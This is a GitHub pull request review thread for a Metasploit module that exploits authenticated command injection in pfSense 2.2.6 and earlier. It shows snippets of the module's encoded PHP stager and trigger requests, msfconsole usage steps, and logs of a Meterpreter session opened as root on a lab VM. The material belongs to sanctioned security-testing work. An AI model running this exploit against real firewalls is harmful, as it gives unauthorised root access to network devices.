New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
pfsense graph <= 2.2.6 exploit #9362
Conversation
Please add module docs to this |
added module docs |
I have some pfsense vms from the modules I wrote, so I'll give this a test later today |
Sounds great thanks :) |
end | ||
# If the device isn't fully setup, you get stuck at redirects to wizard.php | ||
# however, this does NOT stop exploitation strangely | ||
print_error("pfSense version not detected or wizard still enabled.") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
filename = rand_text_alpha(rand(20)) | ||
|
||
# generate the PHP meterpreter payload | ||
stager = "echo \'<?php " |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
# don't look | ||
complete_stage = "" | ||
for i in 0..(stager.length()-1) | ||
if "#{version}" =~ /2.2/ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This can be shortened.
if version.to_s =~ /2.2/
complete_stage << '\\'
end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
begin | ||
cookie = login | ||
version = detect_version(cookie) | ||
filename = rand_text_alpha(rand(20)) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
20 seems excessive, maybe 8 or 10?
'uri' => '/status_rrd_graph_img.php', | ||
'method' => 'GET', | ||
'headers' => { | ||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I don't think all of these headers are required.
My guess is the following could be removed:
- user-agent
- Accept
- Accept-Language
- Accept-Encoding
- Origin
- Connection
if res && res.code == 200 | ||
print_status("Triggering the payload, root shell incoming...") | ||
else | ||
print_error("Failed to upload the initial payload...") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
'uri' => '/status_rrd_graph_img.php', | ||
'method' => 'GET', | ||
'headers' => { | ||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
you can prob remove a bunch of these headers
---- --------------- -------- ----------- | ||
PASSWORD pfsense yes Password to login with | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOST 192.168.75.132 yes The target address |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Typically I blank out the lhost to be 1.1.1.1
and rhost to 2.2.2.2
, not only does it protect potential customer privacy (i see its a VM here), but saves a few characters as well
[*] Sending stage (37543 bytes) to 192.168.75.132 | ||
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600 | ||
|
||
meterpreter > getuid |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
usually i thorw a uname -a
here too, shows the kernel and architecture. On a set image it isn't as important, but just something for the future
### pfSense Community Edition 2.2.6-RELEASE | ||
|
||
``` | ||
msf exploit(unix/http/pfsense_graph_injection_exec) > options |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Typically I prefer seeing the options being set ie:
use unix/http/pfesense_graph_injection_exec
set rhost ...
set ...
That takes less lines and shows any non-defaults being set as opposed to show options
. Just for future note
I added the requested changes and tested |
Against my 2.2.6: php reverse meterp looks good:
php/bind_perl fails. doesn't seem to be a firewall thing since other binds dont fail. Either the perl is not compatible, or something else is going on.
bind meterp is good
bind php is no good
reverse perl also fails.
In the other pfsense module, you see i specified only allowed perl and openssl payloads because all the other ones seemed to fail. You'll want to go through and double check which work and which dont and either debug to figure out why, or exclude them. |
So, if I wanted to only allow
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'reverse_tcp',
'RequiredCmd' => 'php meterpreter',
}
}, |
you set the bind shell port to 80, so when it connected it went to the default web server, assumed it was meterp (incorrectly) and acted like the session was open even though it wasn't. I'm not 100% familiar with this portion of MSF and modifying which payloads are accepted for non-cmd payloads.
|
oh yea, another thing, you may want to look into register the php page that was created for cleanup so its automatically removed. |
Alright I went ahead and pushed some changes (thank you for recommending FileDropper). When testing the allowed payloads all seem to work (now). The only issue I have faced is when using php/meterpreter/reverse_tcp
php/download_exec
php/exec
php/meterpreter_reverse_tcp <--- Failphp/reverse_perl (without cleanup)
php/reverse_perl (with cleanup)
php/reverse_php
|
Oh I forgot to mention I also changed line 128 filename = rand_text_alpha(rand(1..10)) When using rand(10) there were cases where the payload would be uploaded as ' '. Which of course would mean nothing gets uploaded. |
strangely php/meterpreter/reverse_tcp isn't listed for me as a payload. |
'Space' => 6000, | ||
'Compat' => | ||
{ | ||
'Arch' => 'php', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
if you get rid of this line, the staged meterpreters show back up. I think thats the way to go at this point and with that last change i'll be happy to land.
Alright I went ahead and removed the requested line. |
nice work! Welcome to being a contributor 🎈 🎉 . |
Release NotesThis module adds an exploit against PFSense firewalls which results in RCE. |
Thank you for all the help 😄 ! |
Description
This module exploits a vulnerability in pfSense version 2.2.6 and before which allows an authenticated user to execute arbitrary operating system commands as root.
Vulnerable Application
This module has been tested successfully on version 2.2.6-RELEASE, 2.2.5-RELEASE, and 2.1.3-RELEASE
Installers:
Verification Steps
msfconsole
use exploit/unix/http/pfsense_graph_injection_exec
set RHOST [IP]
set USERNAME [username]
set PASSWORD [password]
set LHOST [IP]
exploit
Scenarios
pfSense Community Edition 2.2.6-RELEASE
pfSense Community Edition 2.1.3-RELEASE